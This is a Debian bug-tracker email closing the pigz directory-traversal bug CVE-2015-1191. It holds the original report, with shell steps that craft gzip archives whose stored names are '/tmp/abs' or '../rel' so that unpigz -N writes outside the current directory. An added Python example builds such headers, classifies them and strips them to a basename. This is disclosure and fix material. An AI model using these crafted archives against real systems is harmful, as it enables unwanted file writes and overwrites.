Your message dated Sun, 18 Jan 2015 23:18:42 +0000
with message-id <e1ycz7c-00049o...@franck.debian.org>
and subject line Bug#774978: fixed in pigz 2.3.1-2
has caused the Debian Bug report #774978,
regarding pigz: CVE-2015-1191: directory traversal vulnerability
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
774978: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774978
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: pigz
Version: 2.3.1-1
Tags: security
pigz is susceptible to directory traversal vulnerabilities. While
decompressing a file and restoring the file name, it (unlike gzip) will
happily use absolute and relative paths taken from the input. This can
be exploited by a malicious archive to write files outside the current
directory.
1. Absolute path.
A sample could be prepared in the following way:
$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs
Then check it works:
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ unpigz -N abs.gz
$ ls /tmp/abs
/tmp/abs
2. Relative path with "..".
A sample could be prepared in the following way:
$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel
Then check it works:
$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ unpigz -N rel.gz
$ ls ../rel
../rel
--
Alexander Cherepanov
--- End Message ---
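The report above shows the two header shapes that matter (an FNAME field holding an absolute path, and one holding a ".." component). The following script, added here as an editorial example and not part of the bug report or of pigz, builds such gzip members by hand (Python's gzip module refuses to write anything but a basename, so the header is assembled manually), reads the FNAME field back out, classifies it, and then applies gzip's own policy of keeping only the final path component before writing. Names such as make_gzip_with_name, read_stored_name and decompress_with_safe_name are this example's own and are not pigz or gzip APIs.

```python
import gzip
import posixpath
import struct
import zlib
from typing import Optional, Tuple

FNAME = 0x08   # gzip FLG bit: a NUL-terminated original file name follows the header
FEXTRA = 0x04  # gzip FLG bit: an extra field precedes the file name


def make_gzip_with_name(data: bytes, stored_name: str) -> bytes:
    """Build one gzip member whose FNAME field is exactly `stored_name`.

    Constructed for this example only: it reproduces an archive that carries
    a path in FNAME, which is the condition the report describes.
    """
    # ID1 ID2 CM FLG MTIME(4) XFL OS -> 10-byte fixed header (RFC 1952)
    header = struct.pack("<BBBBIBB", 0x1F, 0x8B, 8, FNAME, 0, 0, 255)
    header += stored_name.encode("latin-1") + b"\x00"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw deflate, no zlib wrapper
    body = comp.compress(data) + comp.flush()
    trailer = struct.pack("<II", zlib.crc32(data) & 0xFFFFFFFF, len(data) & 0xFFFFFFFF)
    return header + body + trailer


def read_stored_name(gz: bytes) -> Optional[str]:
    """Return the FNAME field of a gzip header, or None if the flag is not set."""
    if gz[:2] != b"\x1f\x8b" or gz[2] != 8:
        raise ValueError("not a gzip (deflate) member")
    flg = gz[3]
    pos = 10
    if flg & FEXTRA:
        xlen = struct.unpack_from("<H", gz, pos)[0]
        pos += 2 + xlen
    if not flg & FNAME:
        return None
    end = gz.index(b"\x00", pos)
    return gz[pos:end].decode("latin-1")


def classify_stored_name(stored_name: str) -> str:
    """Label a stored name the way a scanner would: absolute, traversal or plain."""
    if stored_name.startswith("/"):
        return "absolute"
    if ".." in stored_name.split("/"):
        return "traversal"
    return "plain"


def safe_output_name(stored_name: str, fallback: str) -> str:
    """Keep only the last path component, as gzip does; fall back if nothing usable is left."""
    name = posixpath.basename(stored_name)
    if name in ("", ".", ".."):
        return fallback
    return name


def decompress_with_safe_name(gz: bytes, fallback: str) -> Tuple[str, bytes]:
    """Decompress a member and choose an output name that cannot leave the cwd."""
    stored = read_stored_name(gz)
    name = safe_output_name(stored, fallback) if stored is not None else fallback
    return name, gzip.decompress(gz)


if __name__ == "__main__":
    # Constructed samples mirroring the two cases in the report.
    for stored in ("/tmp/abs", "../rel", "plain.txt"):
        member = make_gzip_with_name(b"hello\n", stored)
        name, data = decompress_with_safe_name(member, "output")
        print(f"{stored!r:12} -> {classify_stored_name(stored):10} written as {name!r}")
```

The member built for "/tmp/abs" is accepted by gzip.decompress, so the data is intact; the only thing the policy changes is where it lands. The fix shipped in pigz 2.3.1-2 applies the same idea to the -N option: the directory part of the stored name is never honoured.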
--- Begin Message ---
Source: pigz
Source-Version: 2.3.1-2
We believe that the bug you reported is fixed in the latest version of
pigz, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 774...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Eduard Bloch <bl...@debian.org> (supplier of updated pigz package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sun, 18 Jan 2015 23:58:51 +0100
Source: pigz
Binary: pigz
Architecture: source
Version: 2.3.1-2
Distribution: unstable
Urgency: high
Maintainer: Eduard Bloch <bl...@debian.org>
Changed-By: Eduard Bloch <bl...@debian.org>
Description:
pigz - Parallel Implementation of GZip
Closes: 774978
Changes:
pigz (2.3.1-2) unstable; urgency=high
.
  * Patch(es) from upstream's SCM to solve handling of target file names with
    the -N option (CVE-2015-1191, closes: #774978)
Checksums-Sha1:
5d8b2cde2befd3f50eb2f2b57095c10aa417fb13 1647 pigz_2.3.1-2.dsc
49577b466c87ccfd931e3ab3480406085156ecf0 5180 pigz_2.3.1-2.debian.tar.xz
Checksums-Sha256:
88888e0848d513a55e8ec22d03cf6747f271010019c03dad71160a35a2ee7d5f 1647 pigz_2.3.1-2.dsc
edcbc59e062416e2307bef52b88a914261b99b2497ffc1ac9cd606f310c9b02a 5180 pigz_2.3.1-2.debian.tar.xz
Files:
8eb78b4d666b26e8801a44104694218e 1647 utils extra pigz_2.3.1-2.dsc
ef4c4fab3d625f5b2ee7933bd5557e36 5180 utils extra pigz_2.3.1-2.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

=IEco
-----END PGP SIGNATURE-----
--- End Message ---